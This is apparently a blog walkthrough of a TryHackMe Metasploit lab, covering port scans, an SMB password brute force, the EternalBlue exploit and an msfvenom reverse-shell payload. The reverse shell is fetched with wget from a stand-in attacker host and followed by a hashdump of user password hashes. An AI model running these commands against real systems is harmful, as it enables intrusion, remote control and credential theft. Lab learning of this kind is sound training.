Metasploit: Exploitation Walkthrough TryHackMe

Domiziana Foti
7 min readAug 4, 2022

--

The Metasploit Project is a computer security initiative that aids penetration testing and gives information on security flaws.

This room will be focused on Metasploit Framework, which is a group of tools that enables data collecting, scanning, exploitation, exploit vulnerability, post-exploitation, and other activities.

The first question it’s related to port scanning and can be solved using two different methods.

Since Metasploit Framework is a console application we can execute nmap in the command line.

We then use nmap and the destination IP to see what ports are open. We can use more advanced commands to get more details and information, but since we only need to know the open ports to answer the question, we can run this basic command.

The second method requires the use of the portscan related command.

So, first we use the search command to search for different scanning tasks that can be performed and then we select the one we need.

On metasploit any module that is not an exploit is an auxiliary module. Then we use show options to see what we need to set. In this case we need only to set RHOSTS.

RHOST refers to the IP address of the target host.

In fact, both methods give the same result, 5 ports are opened on the target host, which is very useful information to know before conducting an attack.

The next question require to use the suitable scanner in order to find the NetBIOS name.

NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network.

When we are not sure which command to use, we can take advantage of search to look up which is the actual command to use. After finding it, we set the RHOSTS and then run so we can find the NetBIOS name.

The following question require to see what is running on a specific port.

As before we have to use the command related to port scanning but in this case we have to set the search to a spefic port.

Port 8000 is commonly used as an alternate HTTP port, so the command to be used for our scan logically will have to include it. If in doubt about what the actual commands to use are, I recommend these two sites : InfosecMatter and OffensiveSecurity.

The next step is to set RPORT (which is the destination port) and then run to get our response.

The next question require us the find the password of a specific user.

Server Message Block (SMB) enables file sharing, printer sharing, network browsing, and inter-process communication (through named pipes) over a computer network.

So first of all we use the correct command for smb and then we use show options to better understand what we need to set to find the password.

It is important that we enter the entire path of where the document containing the passwords to be used for the brute force attack (i.e., the command set FILE_PASS) is located.

After we have set all the values we hit run and we find which password had a success.

The next question require us to use the ability the search on metasploit.

The Simple Mail Transfer Protocol (SMTP) is an internet standard communication protocol for electronic mail transmission.

So we use as previously the command search and SMTP to see what’s the full correct command to use and then find the info that we need.

This next question is asking us to utilize the EternaBlue exploit.

The National Security Agency of the United States developed EternalBlue. The vulnerability was subsequently publicly disclosed by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft provided patches to address it. It became well-known for the 2017 WannaCry ransomware and the NotPetya cyberattack in the same year.

To solve this question we must first use the Eternalblue exploit. We can see that I have already set the specific payload I want to use (windows/x64/meterpreter/reverse_tcp), but in case you want to use a different one, you can select show payloads to decide which one to use.

Then we select the show options commands, we set RHOSTS with the ip of the target machine and eventually we use the exploit command.

After everything is successful we look for the flag.txt document and download it to read.

NTLM (New Technology LAN Manager) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users.

Finding the command to solve this question was difficult, I ended up looking on the OffensiveSecurity site and used the correct command.

The last task require us to use Msfvenom, which basically allow you to generate payloads.

The first step is to write the command, in this case we are using the linux one but msfvenom can be used to create payloads in almost all formats.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

For LHOSTS we have to enter our IP while for LPORT the port we want to use.

Then we use Python web server on our attacking machine with the python3 -m http.server 9000 command.

Now we connect via SSH to the account Murphy (which is provided by the room along with the password: 1q2w3e4r.)

Next we use the command sudo su to get a root shell and if we use the command ls we can see listed the files. We need to download the elf file in the target machine so we use this command:

wget http://ATTACKING_MACHINE_IP:9000/rev_shell.elf

The elf (Executable and Linkable Format), is a common standard file format for executable files.

Now we can find the rev_shell.elf file listed in our directory, which means it was successfully downloaded. But we although is an executable file we have to use the chmod 777 rev_shell.elf command to accord executable permissions. In fact after that the file is green which means now it is executable.

Next step is to use the exploit/multi/handler command, all metasploit payloads and can be used for Meterpreter as well as regular shells.

The exploit/multi/handler is more of a stub for whatever payload handler you need to run.

To use the module, we will need to set the payload, the LHOST, and LPORT values.

As the last step the reverse shell is activated, the connection will be received by multi/handler and provide us with a shell.
Since we set the payload as Meterpreter we are provided with a Meterpreter shell.

To answer the initial question of getting the password of the other user, which now we know is “claire”, we use the hashdump command (don’t forget to write run as me lol):

run post/linux/gather/hashdump

--

--

No responses yet